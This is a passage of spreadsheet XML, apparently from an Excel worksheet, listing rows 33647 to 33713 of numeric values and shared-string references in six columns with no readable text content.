        <v>4870.0</v>
      </c>
      <c r="B33647" s="2">
        <v>4.3826149E7</v>
      </c>
      <c r="C33647" s="2" t="s">
        <v>32389</v>
      </c>
      <c r="D33647" s="2">
        <v>1.0</v>
      </c>
      <c r="E33647" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33647" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33648" ht="15.75" customHeight="1">
      <c r="A33648" s="1">
        <v>4875.0</v>
      </c>
      <c r="B33648" s="2">
        <v>4.385039E7</v>
      </c>
      <c r="C33648" s="2" t="s">
        <v>32390</v>
      </c>
      <c r="D33648" s="2">
        <v>1.0</v>
      </c>
      <c r="E33648" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33648" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33649" ht="15.75" customHeight="1">
      <c r="A33649" s="1">
        <v>4887.0</v>
      </c>
      <c r="B33649" s="2">
        <v>4.386801E7</v>
      </c>
      <c r="C33649" s="2" t="s">
        <v>32391</v>
      </c>
      <c r="D33649" s="2">
        <v>1.0</v>
      </c>
      <c r="E33649" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33649" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33650" ht="15.75" customHeight="1">
      <c r="A33650" s="1">
        <v>4894.0</v>
      </c>
      <c r="B33650" s="2">
        <v>4.3876717E7</v>
      </c>
      <c r="C33650" s="2" t="s">
        <v>32392</v>
      </c>
      <c r="D33650" s="2">
        <v>1.0</v>
      </c>
      <c r="E33650" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33650" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33651" ht="15.75" customHeight="1">
      <c r="A33651" s="1">
        <v>4908.0</v>
      </c>
      <c r="B33651" s="2">
        <v>4.3921211E7</v>
      </c>
      <c r="C33651" s="2" t="s">
        <v>32393</v>
      </c>
      <c r="D33651" s="2">
        <v>1.0</v>
      </c>
      <c r="E33651" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33651" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33652" ht="15.75" customHeight="1">
      <c r="A33652" s="1">
        <v>4928.0</v>
      </c>
      <c r="B33652" s="2">
        <v>4.3988028E7</v>
      </c>
      <c r="C33652" s="2" t="s">
        <v>32394</v>
      </c>
      <c r="D33652" s="2">
        <v>1.0</v>
      </c>
      <c r="E33652" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33652" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33653" ht="15.75" customHeight="1">
      <c r="A33653" s="1">
        <v>4939.0</v>
      </c>
      <c r="B33653" s="2">
        <v>4.4007315E7</v>
      </c>
      <c r="C33653" s="2" t="s">
        <v>32395</v>
      </c>
      <c r="D33653" s="2">
        <v>1.0</v>
      </c>
      <c r="E33653" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33653" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33654" ht="15.75" customHeight="1">
      <c r="A33654" s="1">
        <v>4941.0</v>
      </c>
      <c r="B33654" s="2">
        <v>4.4007315E7</v>
      </c>
      <c r="C33654" s="2" t="s">
        <v>32396</v>
      </c>
      <c r="D33654" s="2">
        <v>1.0</v>
      </c>
      <c r="E33654" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33654" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33655" ht="15.75" customHeight="1">
      <c r="A33655" s="1">
        <v>4972.0</v>
      </c>
      <c r="B33655" s="2">
        <v>4.4102811E7</v>
      </c>
      <c r="C33655" s="2" t="s">
        <v>32397</v>
      </c>
      <c r="D33655" s="2">
        <v>1.0</v>
      </c>
      <c r="E33655" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33655" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33656" ht="15.75" customHeight="1">
      <c r="A33656" s="1">
        <v>5001.0</v>
      </c>
      <c r="B33656" s="2">
        <v>4.4177805E7</v>
      </c>
      <c r="C33656" s="2" t="s">
        <v>32398</v>
      </c>
      <c r="D33656" s="2">
        <v>1.0</v>
      </c>
      <c r="E33656" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33656" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33657" ht="15.75" customHeight="1">
      <c r="A33657" s="1">
        <v>5036.0</v>
      </c>
      <c r="B33657" s="2">
        <v>4.4269856E7</v>
      </c>
      <c r="C33657" s="2" t="s">
        <v>32399</v>
      </c>
      <c r="D33657" s="2">
        <v>1.0</v>
      </c>
      <c r="E33657" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33657" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33658" ht="15.75" customHeight="1">
      <c r="A33658" s="1">
        <v>5053.0</v>
      </c>
      <c r="B33658" s="2">
        <v>4.4346675E7</v>
      </c>
      <c r="C33658" s="2" t="s">
        <v>32400</v>
      </c>
      <c r="D33658" s="2">
        <v>1.0</v>
      </c>
      <c r="E33658" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33658" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33659" ht="15.75" customHeight="1">
      <c r="A33659" s="1">
        <v>5060.0</v>
      </c>
      <c r="B33659" s="2">
        <v>4.4356697E7</v>
      </c>
      <c r="C33659" s="2" t="s">
        <v>32401</v>
      </c>
      <c r="D33659" s="2">
        <v>1.0</v>
      </c>
      <c r="E33659" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33659" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33660" ht="15.75" customHeight="1">
      <c r="A33660" s="1">
        <v>5169.0</v>
      </c>
      <c r="B33660" s="2">
        <v>4.4750867E7</v>
      </c>
      <c r="C33660" s="2" t="s">
        <v>32402</v>
      </c>
      <c r="D33660" s="2">
        <v>1.0</v>
      </c>
      <c r="E33660" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33660" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33661" ht="15.75" customHeight="1">
      <c r="A33661" s="1">
        <v>5176.0</v>
      </c>
      <c r="B33661" s="2">
        <v>4.4756665E7</v>
      </c>
      <c r="C33661" s="2" t="s">
        <v>32403</v>
      </c>
      <c r="D33661" s="2">
        <v>1.0</v>
      </c>
      <c r="E33661" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33661" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33662" ht="15.75" customHeight="1">
      <c r="A33662" s="1">
        <v>5188.0</v>
      </c>
      <c r="B33662" s="2">
        <v>4.4787543E7</v>
      </c>
      <c r="C33662" s="2" t="s">
        <v>32404</v>
      </c>
      <c r="D33662" s="2">
        <v>1.0</v>
      </c>
      <c r="E33662" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33662" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33663" ht="15.75" customHeight="1">
      <c r="A33663" s="1">
        <v>5190.0</v>
      </c>
      <c r="B33663" s="2">
        <v>4.479333E7</v>
      </c>
      <c r="C33663" s="2" t="s">
        <v>32405</v>
      </c>
      <c r="D33663" s="2">
        <v>1.0</v>
      </c>
      <c r="E33663" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33663" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33664" ht="15.75" customHeight="1">
      <c r="A33664" s="1">
        <v>5204.0</v>
      </c>
      <c r="B33664" s="2">
        <v>4.4905732E7</v>
      </c>
      <c r="C33664" s="2" t="s">
        <v>32406</v>
      </c>
      <c r="D33664" s="2">
        <v>1.0</v>
      </c>
      <c r="E33664" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33664" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33665" ht="15.75" customHeight="1">
      <c r="A33665" s="1">
        <v>5244.0</v>
      </c>
      <c r="B33665" s="2">
        <v>4.5042802E7</v>
      </c>
      <c r="C33665" s="2" t="s">
        <v>32407</v>
      </c>
      <c r="D33665" s="2">
        <v>1.0</v>
      </c>
      <c r="E33665" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33665" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33666" ht="15.75" customHeight="1">
      <c r="A33666" s="1">
        <v>5259.0</v>
      </c>
      <c r="B33666" s="2">
        <v>4.5109347E7</v>
      </c>
      <c r="C33666" s="2" t="s">
        <v>32408</v>
      </c>
      <c r="D33666" s="2">
        <v>1.0</v>
      </c>
      <c r="E33666" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33666" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33667" ht="15.75" customHeight="1">
      <c r="A33667" s="1">
        <v>5329.0</v>
      </c>
      <c r="B33667" s="2">
        <v>4.5311154E7</v>
      </c>
      <c r="C33667" s="2" t="s">
        <v>32409</v>
      </c>
      <c r="D33667" s="2">
        <v>1.0</v>
      </c>
      <c r="E33667" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33667" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33668" ht="15.75" customHeight="1">
      <c r="A33668" s="1">
        <v>5409.0</v>
      </c>
      <c r="B33668" s="2">
        <v>4.5515499E7</v>
      </c>
      <c r="C33668" s="2" t="s">
        <v>32410</v>
      </c>
      <c r="D33668" s="2">
        <v>1.0</v>
      </c>
      <c r="E33668" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33668" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33669" ht="15.75" customHeight="1">
      <c r="A33669" s="1">
        <v>5515.0</v>
      </c>
      <c r="B33669" s="2">
        <v>4.5850925E7</v>
      </c>
      <c r="C33669" s="2" t="s">
        <v>32411</v>
      </c>
      <c r="D33669" s="2">
        <v>1.0</v>
      </c>
      <c r="E33669" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33669" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33670" ht="15.75" customHeight="1">
      <c r="A33670" s="1">
        <v>5523.0</v>
      </c>
      <c r="B33670" s="2">
        <v>4.5873124E7</v>
      </c>
      <c r="C33670" s="2" t="s">
        <v>32412</v>
      </c>
      <c r="D33670" s="2">
        <v>1.0</v>
      </c>
      <c r="E33670" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33670" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33671" ht="15.75" customHeight="1">
      <c r="A33671" s="1">
        <v>5537.0</v>
      </c>
      <c r="B33671" s="2">
        <v>4.5906329E7</v>
      </c>
      <c r="C33671" s="2" t="s">
        <v>32413</v>
      </c>
      <c r="D33671" s="2">
        <v>1.0</v>
      </c>
      <c r="E33671" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33671" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33672" ht="15.75" customHeight="1">
      <c r="A33672" s="1">
        <v>5544.0</v>
      </c>
      <c r="B33672" s="2">
        <v>4.5925699E7</v>
      </c>
      <c r="C33672" s="2" t="s">
        <v>32414</v>
      </c>
      <c r="D33672" s="2">
        <v>1.0</v>
      </c>
      <c r="E33672" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33672" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33673" ht="15.75" customHeight="1">
      <c r="A33673" s="1">
        <v>5546.0</v>
      </c>
      <c r="B33673" s="2">
        <v>4.5925699E7</v>
      </c>
      <c r="C33673" s="2" t="s">
        <v>32415</v>
      </c>
      <c r="D33673" s="2">
        <v>1.0</v>
      </c>
      <c r="E33673" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33673" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33674" ht="15.75" customHeight="1">
      <c r="A33674" s="1">
        <v>5561.0</v>
      </c>
      <c r="B33674" s="2">
        <v>4.5989244E7</v>
      </c>
      <c r="C33674" s="2" t="s">
        <v>32416</v>
      </c>
      <c r="D33674" s="2">
        <v>1.0</v>
      </c>
      <c r="E33674" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33674" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33675" ht="15.75" customHeight="1">
      <c r="A33675" s="1">
        <v>5571.0</v>
      </c>
      <c r="B33675" s="2">
        <v>4.6023842E7</v>
      </c>
      <c r="C33675" s="2" t="s">
        <v>32417</v>
      </c>
      <c r="D33675" s="2">
        <v>1.0</v>
      </c>
      <c r="E33675" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33675" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33676" ht="15.75" customHeight="1">
      <c r="A33676" s="1">
        <v>5611.0</v>
      </c>
      <c r="B33676" s="2">
        <v>4.6162728E7</v>
      </c>
      <c r="C33676" s="2" t="s">
        <v>32418</v>
      </c>
      <c r="D33676" s="2">
        <v>1.0</v>
      </c>
      <c r="E33676" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33676" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33677" ht="15.75" customHeight="1">
      <c r="A33677" s="1">
        <v>5616.0</v>
      </c>
      <c r="B33677" s="2">
        <v>4.6177594E7</v>
      </c>
      <c r="C33677" s="2" t="s">
        <v>32419</v>
      </c>
      <c r="D33677" s="2">
        <v>1.0</v>
      </c>
      <c r="E33677" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33677" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33678" ht="15.75" customHeight="1">
      <c r="A33678" s="1">
        <v>5637.0</v>
      </c>
      <c r="B33678" s="2">
        <v>4.625754E7</v>
      </c>
      <c r="C33678" s="2" t="s">
        <v>32420</v>
      </c>
      <c r="D33678" s="2">
        <v>1.0</v>
      </c>
      <c r="E33678" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33678" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33679" ht="15.75" customHeight="1">
      <c r="A33679" s="1">
        <v>5640.0</v>
      </c>
      <c r="B33679" s="2">
        <v>4.6261215E7</v>
      </c>
      <c r="C33679" s="2" t="s">
        <v>32421</v>
      </c>
      <c r="D33679" s="2">
        <v>1.0</v>
      </c>
      <c r="E33679" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33679" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33680" ht="15.75" customHeight="1">
      <c r="A33680" s="1">
        <v>5648.0</v>
      </c>
      <c r="B33680" s="2">
        <v>4.6276408E7</v>
      </c>
      <c r="C33680" s="2" t="s">
        <v>32422</v>
      </c>
      <c r="D33680" s="2">
        <v>1.0</v>
      </c>
      <c r="E33680" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33680" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33681" ht="15.75" customHeight="1">
      <c r="A33681" s="1">
        <v>5699.0</v>
      </c>
      <c r="B33681" s="2">
        <v>4.6506947E7</v>
      </c>
      <c r="C33681" s="2" t="s">
        <v>32423</v>
      </c>
      <c r="D33681" s="2">
        <v>1.0</v>
      </c>
      <c r="E33681" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33681" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33682" ht="15.75" customHeight="1">
      <c r="A33682" s="1">
        <v>5723.0</v>
      </c>
      <c r="B33682" s="2">
        <v>4.6591648E7</v>
      </c>
      <c r="C33682" s="2" t="s">
        <v>32424</v>
      </c>
      <c r="D33682" s="2">
        <v>1.0</v>
      </c>
      <c r="E33682" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33682" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33683" ht="15.75" customHeight="1">
      <c r="A33683" s="1">
        <v>5734.0</v>
      </c>
      <c r="B33683" s="2">
        <v>4.6611509E7</v>
      </c>
      <c r="C33683" s="2" t="s">
        <v>32425</v>
      </c>
      <c r="D33683" s="2">
        <v>1.0</v>
      </c>
      <c r="E33683" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33683" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33684" ht="15.75" customHeight="1">
      <c r="A33684" s="1">
        <v>5741.0</v>
      </c>
      <c r="B33684" s="2">
        <v>4.6626831E7</v>
      </c>
      <c r="C33684" s="2" t="s">
        <v>32426</v>
      </c>
      <c r="D33684" s="2">
        <v>1.0</v>
      </c>
      <c r="E33684" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33684" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33685" ht="15.75" customHeight="1">
      <c r="A33685" s="1">
        <v>5765.0</v>
      </c>
      <c r="B33685" s="2">
        <v>4.669121E7</v>
      </c>
      <c r="C33685" s="2" t="s">
        <v>32427</v>
      </c>
      <c r="D33685" s="2">
        <v>1.0</v>
      </c>
      <c r="E33685" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33685" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33686" ht="15.75" customHeight="1">
      <c r="A33686" s="1">
        <v>5787.0</v>
      </c>
      <c r="B33686" s="2">
        <v>4.6753912E7</v>
      </c>
      <c r="C33686" s="2" t="s">
        <v>32428</v>
      </c>
      <c r="D33686" s="2">
        <v>1.0</v>
      </c>
      <c r="E33686" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33686" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33687" ht="15.75" customHeight="1">
      <c r="A33687" s="1">
        <v>5832.0</v>
      </c>
      <c r="B33687" s="2">
        <v>4.6905059E7</v>
      </c>
      <c r="C33687" s="2" t="s">
        <v>32429</v>
      </c>
      <c r="D33687" s="2">
        <v>1.0</v>
      </c>
      <c r="E33687" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33687" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33688" ht="15.75" customHeight="1">
      <c r="A33688" s="1">
        <v>5837.0</v>
      </c>
      <c r="B33688" s="2">
        <v>4.6905201E7</v>
      </c>
      <c r="C33688" s="2" t="s">
        <v>32430</v>
      </c>
      <c r="D33688" s="2">
        <v>1.0</v>
      </c>
      <c r="E33688" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33688" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33689" ht="15.75" customHeight="1">
      <c r="A33689" s="1">
        <v>5879.0</v>
      </c>
      <c r="B33689" s="2">
        <v>4.707094E7</v>
      </c>
      <c r="C33689" s="2" t="s">
        <v>32431</v>
      </c>
      <c r="D33689" s="2">
        <v>1.0</v>
      </c>
      <c r="E33689" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33689" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33690" ht="15.75" customHeight="1">
      <c r="A33690" s="1">
        <v>5889.0</v>
      </c>
      <c r="B33690" s="2">
        <v>4709179.0</v>
      </c>
      <c r="C33690" s="2" t="s">
        <v>32432</v>
      </c>
      <c r="D33690" s="2">
        <v>1.0</v>
      </c>
      <c r="E33690" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33690" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33691" ht="15.75" customHeight="1">
      <c r="A33691" s="1">
        <v>5934.0</v>
      </c>
      <c r="B33691" s="2">
        <v>4.7261472E7</v>
      </c>
      <c r="C33691" s="2" t="s">
        <v>32433</v>
      </c>
      <c r="D33691" s="2">
        <v>1.0</v>
      </c>
      <c r="E33691" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33691" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33692" ht="15.75" customHeight="1">
      <c r="A33692" s="1">
        <v>5949.0</v>
      </c>
      <c r="B33692" s="2">
        <v>4.7285679E7</v>
      </c>
      <c r="C33692" s="2" t="s">
        <v>32434</v>
      </c>
      <c r="D33692" s="2">
        <v>1.0</v>
      </c>
      <c r="E33692" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33692" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33693" ht="15.75" customHeight="1">
      <c r="A33693" s="1">
        <v>5956.0</v>
      </c>
      <c r="B33693" s="2">
        <v>4.7289141E7</v>
      </c>
      <c r="C33693" s="2" t="s">
        <v>32435</v>
      </c>
      <c r="D33693" s="2">
        <v>1.0</v>
      </c>
      <c r="E33693" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33693" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33694" ht="15.75" customHeight="1">
      <c r="A33694" s="1">
        <v>5974.0</v>
      </c>
      <c r="B33694" s="2">
        <v>4.7367993E7</v>
      </c>
      <c r="C33694" s="2" t="s">
        <v>32436</v>
      </c>
      <c r="D33694" s="2">
        <v>1.0</v>
      </c>
      <c r="E33694" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33694" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33695" ht="15.75" customHeight="1">
      <c r="A33695" s="1">
        <v>5991.0</v>
      </c>
      <c r="B33695" s="2">
        <v>4.743396E7</v>
      </c>
      <c r="C33695" s="2" t="s">
        <v>32437</v>
      </c>
      <c r="D33695" s="2">
        <v>1.0</v>
      </c>
      <c r="E33695" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33695" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33696" ht="15.75" customHeight="1">
      <c r="A33696" s="1">
        <v>6058.0</v>
      </c>
      <c r="B33696" s="2">
        <v>4.7613459E7</v>
      </c>
      <c r="C33696" s="2" t="s">
        <v>32438</v>
      </c>
      <c r="D33696" s="2">
        <v>1.0</v>
      </c>
      <c r="E33696" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33696" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33697" ht="15.75" customHeight="1">
      <c r="A33697" s="1">
        <v>6101.0</v>
      </c>
      <c r="B33697" s="2">
        <v>4.7713854E7</v>
      </c>
      <c r="C33697" s="2" t="s">
        <v>32439</v>
      </c>
      <c r="D33697" s="2">
        <v>1.0</v>
      </c>
      <c r="E33697" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33697" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33698" ht="15.75" customHeight="1">
      <c r="A33698" s="1">
        <v>6135.0</v>
      </c>
      <c r="B33698" s="2">
        <v>4.781831E7</v>
      </c>
      <c r="C33698" s="2" t="s">
        <v>32440</v>
      </c>
      <c r="D33698" s="2">
        <v>1.0</v>
      </c>
      <c r="E33698" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33698" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33699" ht="15.75" customHeight="1">
      <c r="A33699" s="1">
        <v>6161.0</v>
      </c>
      <c r="B33699" s="2">
        <v>4.7872694E7</v>
      </c>
      <c r="C33699" s="2" t="s">
        <v>32441</v>
      </c>
      <c r="D33699" s="2">
        <v>1.0</v>
      </c>
      <c r="E33699" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33699" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33700" ht="15.75" customHeight="1">
      <c r="A33700" s="1">
        <v>6261.0</v>
      </c>
      <c r="B33700" s="2">
        <v>4.8115828E7</v>
      </c>
      <c r="C33700" s="2" t="s">
        <v>32442</v>
      </c>
      <c r="D33700" s="2">
        <v>1.0</v>
      </c>
      <c r="E33700" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33700" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33701" ht="15.75" customHeight="1">
      <c r="A33701" s="1">
        <v>6268.0</v>
      </c>
      <c r="B33701" s="2">
        <v>4.8127189E7</v>
      </c>
      <c r="C33701" s="2" t="s">
        <v>32443</v>
      </c>
      <c r="D33701" s="2">
        <v>1.0</v>
      </c>
      <c r="E33701" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33701" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33702" ht="15.75" customHeight="1">
      <c r="A33702" s="1">
        <v>6300.0</v>
      </c>
      <c r="B33702" s="2">
        <v>4.8219258E7</v>
      </c>
      <c r="C33702" s="2" t="s">
        <v>32444</v>
      </c>
      <c r="D33702" s="2">
        <v>1.0</v>
      </c>
      <c r="E33702" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33702" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33703" ht="15.75" customHeight="1">
      <c r="A33703" s="1">
        <v>6311.0</v>
      </c>
      <c r="B33703" s="2">
        <v>4.824564E7</v>
      </c>
      <c r="C33703" s="2" t="s">
        <v>32445</v>
      </c>
      <c r="D33703" s="2">
        <v>1.0</v>
      </c>
      <c r="E33703" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33703" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33704" ht="15.75" customHeight="1">
      <c r="A33704" s="1">
        <v>6345.0</v>
      </c>
      <c r="B33704" s="2">
        <v>4.8311723E7</v>
      </c>
      <c r="C33704" s="2" t="s">
        <v>32446</v>
      </c>
      <c r="D33704" s="2">
        <v>1.0</v>
      </c>
      <c r="E33704" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33704" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33705" ht="15.75" customHeight="1">
      <c r="A33705" s="1">
        <v>6409.0</v>
      </c>
      <c r="B33705" s="2">
        <v>4.8511034E7</v>
      </c>
      <c r="C33705" s="2" t="s">
        <v>32447</v>
      </c>
      <c r="D33705" s="2">
        <v>1.0</v>
      </c>
      <c r="E33705" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33705" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33706" ht="15.75" customHeight="1">
      <c r="A33706" s="1">
        <v>6431.0</v>
      </c>
      <c r="B33706" s="2">
        <v>4.8576333E7</v>
      </c>
      <c r="C33706" s="2" t="s">
        <v>32448</v>
      </c>
      <c r="D33706" s="2">
        <v>1.0</v>
      </c>
      <c r="E33706" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33706" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33707" ht="15.75" customHeight="1">
      <c r="A33707" s="1">
        <v>6465.0</v>
      </c>
      <c r="B33707" s="2">
        <v>4.8636791E7</v>
      </c>
      <c r="C33707" s="2" t="s">
        <v>32449</v>
      </c>
      <c r="D33707" s="2">
        <v>1.0</v>
      </c>
      <c r="E33707" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33707" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33708" ht="15.75" customHeight="1">
      <c r="A33708" s="1">
        <v>6490.0</v>
      </c>
      <c r="B33708" s="2">
        <v>4.8684065E7</v>
      </c>
      <c r="C33708" s="2" t="s">
        <v>32450</v>
      </c>
      <c r="D33708" s="2">
        <v>1.0</v>
      </c>
      <c r="E33708" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33708" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33709" ht="15.75" customHeight="1">
      <c r="A33709" s="1">
        <v>6491.0</v>
      </c>
      <c r="B33709" s="2">
        <v>4.8684065E7</v>
      </c>
      <c r="C33709" s="2" t="s">
        <v>32451</v>
      </c>
      <c r="D33709" s="2">
        <v>1.0</v>
      </c>
      <c r="E33709" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33709" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33710" ht="15.75" customHeight="1">
      <c r="A33710" s="1">
        <v>6492.0</v>
      </c>
      <c r="B33710" s="2">
        <v>4.8684065E7</v>
      </c>
      <c r="C33710" s="2" t="s">
        <v>32452</v>
      </c>
      <c r="D33710" s="2">
        <v>1.0</v>
      </c>
      <c r="E33710" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33710" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33711" ht="15.75" customHeight="1">
      <c r="A33711" s="1">
        <v>6497.0</v>
      </c>
      <c r="B33711" s="2">
        <v>4.8706693E7</v>
      </c>
      <c r="C33711" s="2" t="s">
        <v>32453</v>
      </c>
      <c r="D33711" s="2">
        <v>1.0</v>
      </c>
      <c r="E33711" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33711" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33712" ht="15.75" customHeight="1">
      <c r="A33712" s="1">
        <v>6498.0</v>
      </c>
      <c r="B33712" s="2">
        <v>4.8706693E7</v>
      </c>
      <c r="C33712" s="2" t="s">
        <v>32454</v>
      </c>
      <c r="D33712" s="2">
        <v>1.0</v>
      </c>
      <c r="E33712" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33712" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33713" ht="15.75" customHeight="1">
      <c r="A33713" s="1">
        <v>6527.0</v>
      </c>
      <c r="B33713" s="2">
        <v>4.8828084E7</v>
      </c>
      <c r="C33713" s="2" t="s">
        <v>32455</v>
      </c>
      <c r="D33713" s="2">
        <v>1.0</v>
      </c>
      <c r="E33713" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33713" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33714" ht="15.75" customHeight="1">
      <c r="A33714" s="1">
